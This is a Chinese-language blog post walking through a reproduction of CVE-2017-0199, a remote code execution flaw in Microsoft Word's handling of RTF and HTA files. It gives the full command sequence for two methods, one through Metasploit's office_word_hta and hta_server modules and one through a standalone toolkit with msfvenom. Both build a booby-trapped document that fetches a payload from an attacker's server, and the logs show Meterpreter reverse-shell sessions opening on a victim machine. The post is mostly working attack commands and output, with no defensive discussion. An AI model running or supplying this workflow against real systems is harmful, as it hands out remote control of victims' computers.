MENU

CVE-2017-0199 复现

April 19, 2017 • Read: 3292 • 安全

0x01 通过Metasploit

参考链接

准备

更新 MSF 到最新。

下载对应 Exploit

cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

下载 rtf 文件

cd /usr/share/metasploit-framework/data/exploits
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

开启 HTA 服务

msf > use exploit/windows/misc/hta_server 
msf exploit(hta_server) > show options 

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86


msf exploit(hta_server) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Using URL: http://0.0.0.0:8080/5Fzi0vL.hta
[*] Local IP: http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(hta_server) > [*] Server started.
msf exploit(hta_server) > 

生成 payload

msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta 
msf exploit(office_word_hta) > show options 

Module options (exploit/windows/fileformat/office_word_hta):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   FILENAME                                no        The file name.
   TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf exploit(office_word_hta) > set TARGETURI http://10.14.81.6:8080/5Fzi0vL.hta
TARGETURI => http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run

[+] msf.doc stored at /root/.msf4/local/msf.doc
msf exploit(office_word_hta) > 

将生成的 msf.doc 文件复制到 Windows 上,打开即可获取一个会话。

被害者

msf exploit(office_word_hta) > 
[*] 10.14.89.247     hta_server - Delivering Payload
[*] 10.14.89.247     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:10576) at 2017-04-19 21:58:03 +0800

msf exploit(office_word_hta) > sessions -i

Active sessions
===============

  Id  Type                     Information       Connection
  --  ----                     -----------       ----------
  1   meterpreter x86/windows  hp-PC\hp @ HP-PC  10.14.81.6:4444 -> 10.14.89.247:10576 (10.14.89.247)

msf exploit(office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows

0x02 通过 Toolkit

准备

下载 Toolkit

生成 payload

python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

生成 meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

开启 HTA 服务

python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>

受害者打开文档后收到 shell。

toolkit

[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:12775) at 2017-04-19 23:09:03 +0800

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > screenshot 
[-] stdapi_ui_desktop_screenshot: Operation failed: Access is denied.
Archives QR Code
QR Code for this page
Tipping QR Code